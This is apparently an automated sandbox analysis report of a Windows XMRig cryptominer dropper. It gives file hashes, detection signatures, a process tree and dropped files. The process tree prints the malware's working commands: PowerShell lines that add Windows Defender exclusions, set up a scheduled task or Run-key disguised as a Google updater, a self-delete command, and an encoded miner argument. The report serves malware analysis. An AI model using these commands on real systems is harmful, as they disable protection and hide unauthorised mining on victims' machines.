Resubmissions

11/02/2025, 16:33

250211-t2ztsstkey 10

11/02/2025, 16:33

250211-t2zh2atkex 10

11/02/2025, 16:33

250211-t2yxhatkew 10

11/02/2025, 16:33

250211-t2nrjasqdk 10

24/10/2024, 20:12

241024-yyvg5asemn 10

24/10/2024, 20:11

241024-yygk9ssemk 10

24/10/2024, 20:11

241024-yygahasemj 10

24/10/2024, 20:11

241024-yyd55sselq 10

24/10/2024, 20:08

241024-yw247asdqp 10

24/10/2024, 20:08

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    899s
  • max time network
    894s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250211-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/02/2025, 16:33

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (27).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3512
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (27).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (27).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4752
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3056
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3124
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (27).exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:840
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2128
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:212
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:3096
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4680
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:3900
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3784
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3836

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log

            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            6d42b6da621e8df5674e26b799c8e2aa

            SHA1

            ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

            SHA256

            5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

            SHA512

            53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            ab602e6df3b92f9c00de0ef91f1af8a3

            SHA1

            744ac8b448c9fca0da0ade862f5bbbe20368d0cc

            SHA256

            c059887ff85868529cafe05912e0ecbd454d101051face8dfa811084e458d7a1

            SHA512

            6c65b454e3df32661f92975600fee15fc46e30d34d8ac3e7384868fb112fc545e4b7732f3fe46abb27288eeea08bb299a87a9273805d5c7be369f8842ce435e2

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5zawedn.cux.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            4KB

            MD5

            fc1eb5010b6ad55adc66af2a5416b776

            SHA1

            268d970aae8bbbd076a1c34b41d6c9fbc6ebfe88

            SHA256

            3f4cb13b4f1e1fd40d1f554875df908dab5bf3233300214e9572d74c86657da9

            SHA512

            f707389df8ef9d805da128675dca3dd6ab54cf8b0b271c31fc2f886c096fbb22dc27b5767e2c1c433ad51835f874a9224cb064ea701b54b3d64e381d2fc9a77f

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            8682772e471a0e8fb38cb90a55bb647b

            SHA1

            c7db8683ed83f0759ecf7f819483eb081492f225

            SHA256

            f6bfc37cf3b113bd2b56e54c3c3116681508de7a7e330ea0164bcc4dc8e0b596

            SHA512

            a8167882467536861c12bcd041028771d82e740f4d09b32b89a4188408dd7fc0260965af17b7c31ab327e8aed1981d33575f786bc13263ab1001896de2af0700

          • memory/212-113-0x00007FF7B00F0000-0x00007FF7B0106000-memory.dmp

            Filesize

            88KB

          • memory/212-108-0x00007FF7B00F0000-0x00007FF7B0106000-memory.dmp

            Filesize

            88KB

          • memory/2128-97-0x000001D96E490000-0x000001D96E545000-memory.dmp

            Filesize

            724KB

          • memory/3544-74-0x00000220ED190000-0x00000220ED19A000-memory.dmp

            Filesize

            40KB

          • memory/3544-72-0x00000220ED130000-0x00000220ED138000-memory.dmp

            Filesize

            32KB

          • memory/3544-71-0x00000220ED170000-0x00000220ED18A000-memory.dmp

            Filesize

            104KB

          • memory/3544-70-0x00000220ECCC0000-0x00000220ECCCA000-memory.dmp

            Filesize

            40KB

          • memory/3544-69-0x00000220ED150000-0x00000220ED16C000-memory.dmp

            Filesize

            112KB

          • memory/3544-73-0x00000220ED140000-0x00000220ED146000-memory.dmp

            Filesize

            24KB

          • memory/3544-67-0x00000220ECF30000-0x00000220ECFE5000-memory.dmp

            Filesize

            724KB

          • memory/3544-68-0x00000220ECCB0000-0x00000220ECCBA000-memory.dmp

            Filesize

            40KB

          • memory/3544-66-0x00000220ECF10000-0x00000220ECF2C000-memory.dmp

            Filesize

            112KB

          • memory/3784-107-0x0000013865610000-0x0000013865630000-memory.dmp

            Filesize

            128KB

          • memory/3784-120-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-166-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-164-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-162-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-160-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-158-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-156-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-154-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-152-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-150-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-148-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-105-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-146-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-144-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-142-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-110-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-109-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-112-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-114-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-140-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-116-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-118-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-138-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-122-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-124-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-126-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-128-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-130-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-132-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-134-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3784-136-0x00007FF70C600000-0x00007FF70CDF4000-memory.dmp

            Filesize

            8.0MB

          • memory/3836-47-0x00007FF6FAC70000-0x00007FF6FAE81000-memory.dmp

            Filesize

            2.1MB

          • memory/3836-106-0x00007FF6FAC70000-0x00007FF6FAE81000-memory.dmp

            Filesize

            2.1MB

          • memory/4500-16-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4500-32-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4500-30-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4500-29-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4500-18-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4500-17-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4752-0-0x00007FF74B420000-0x00007FF74B631000-memory.dmp

            Filesize

            2.1MB

          • memory/4752-34-0x00007FF74B420000-0x00007FF74B631000-memory.dmp

            Filesize

            2.1MB

          • memory/4884-15-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4884-13-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4884-12-0x00007FF93E180000-0x00007FF93EC41000-memory.dmp

            Filesize

            10.8MB

          • memory/4884-7-0x000001EE7C9C0000-0x000001EE7C9E2000-memory.dmp

            Filesize

            136KB

          • memory/4884-1-0x00007FF93E183000-0x00007FF93E185000-memory.dmp

            Filesize

            8KB